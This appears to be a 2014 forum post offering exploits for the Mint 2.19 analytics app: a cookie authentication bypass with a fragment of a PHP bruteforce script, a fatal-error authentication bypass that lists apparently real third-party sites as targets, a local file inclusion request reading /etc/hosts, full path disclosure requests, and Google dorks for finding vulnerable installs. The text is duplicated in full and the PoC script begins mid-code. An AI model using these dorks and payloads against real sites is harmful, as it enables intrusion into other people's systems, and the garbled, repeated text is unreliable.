Unknown
20.04.2014, 19:23
************************************************** ****************************
# App Name: Mint 2.19
# Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "
# Vendor Homepage: www.haveamint.com (http://www.haveamint.com)
************************************************** ****************************/
1. Email verification bypass($_COOKIE and $_GET):
Vulnerable Code(mint.php):
Code:
function isLoggedIn()
{
return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false;
}
POC:
Code:
>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
exit();
}
}
fclose($file);
echo ">>>>>bruteforce UNsuccessful :(\n";
} else echo "ERROR: ".$passlist." not found!\n";
break;
default:
echo "##### Mint 2.19 email verification bypass\n";
echo "##### Author: Unlog\n";
echo "##### Usage:\n".
"\tmint.php -check www.example.com /mint/\n".
"\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
}
?>
Additional Information:
Same vulnerability in authenticateRSS function
Vulnerable Code(mint.php):
Code:
function authenticateRSS()
{
return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
}
POC: Same as above(with some modifications)
2. _Fatal error_ authentification bupass:
Info:
If there is some fatal error like _mysql server down_, no authentification is needed to access preferences
Vulnerable Code(path.php):
Code:
if ($Mint->errors['fatal'])
{
include(MINT_ROOT.'app/paths/errors/index.php');
exit();
}
Google Dork: "Mint was unable to connect" intitle:"Mint:"
POC:
Code:
http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences
3. LFI in mint.php
Info:
LFI Requies access to preferences(can be obtained by using first or second exploit)
Vulnerable Code:
Code:
mint.php:
function installPepper($pathToPepper)
{
include_once(MINT_ROOT.$pathToPepper);
...
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
switch($_POST['action'])
...
case 'Install Pepper':
$Mint->tmp['pageTitle'] = 'Install Pepper';
$Mint->installPepper($_POST['src']);
POC:
Code:
POST http://***/ HTTP/1.0
Host: ***.com
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58
MintPath=Preferences&action=Install Pepper&src=/etc/hosts&
4. Multiple Full Path Disclosure
Vulnerable Code:
Code:
if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file
POC:
Code:
GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
and etc
# App Name: Mint 2.19
# Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "
# Vendor Homepage: www.haveamint.com (http://www.haveamint.com)
************************************************** ****************************/
1. Email verification bypass($_COOKIE and $_GET):
Vulnerable Code(mint.php):
Code:
function isLoggedIn()
{
return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false;
}
POC:
Code:
>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
exit();
}
}
fclose($file);
echo ">>>>>bruteforce UNsuccessful :(\n";
} else echo "ERROR: ".$passlist." not found!\n";
break;
default:
echo "##### Mint 2.19 email verification bypass\n";
echo "##### Author: Unlog\n";
echo "##### Usage:\n".
"\tmint.php -check www.example.com /mint/\n".
"\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
}
?>
Additional Information:
Same vulnerability in authenticateRSS function
Vulnerable Code(mint.php):
Code:
function authenticateRSS()
{
return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
}
POC: Same as above(with some modifications)
2. _Fatal error_ authentification bupass:
Info:
If there is some fatal error like _mysql server down_, no authentification is needed to access preferences
Vulnerable Code(path.php):
Code:
if ($Mint->errors['fatal'])
{
include(MINT_ROOT.'app/paths/errors/index.php');
exit();
}
Google Dork: "Mint was unable to connect" intitle:"Mint:"
POC:
Code:
http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences
3. LFI in mint.php
Info:
LFI Requies access to preferences(can be obtained by using first or second exploit)
Vulnerable Code:
Code:
mint.php:
function installPepper($pathToPepper)
{
include_once(MINT_ROOT.$pathToPepper);
...
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
switch($_POST['action'])
...
case 'Install Pepper':
$Mint->tmp['pageTitle'] = 'Install Pepper';
$Mint->installPepper($_POST['src']);
POC:
Code:
POST http://***/ HTTP/1.0
Host: ***.com
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58
MintPath=Preferences&action=Install Pepper&src=/etc/hosts&
4. Multiple Full Path Disclosure
Vulnerable Code:
Code:
if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file
POC:
Code:
GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
and etc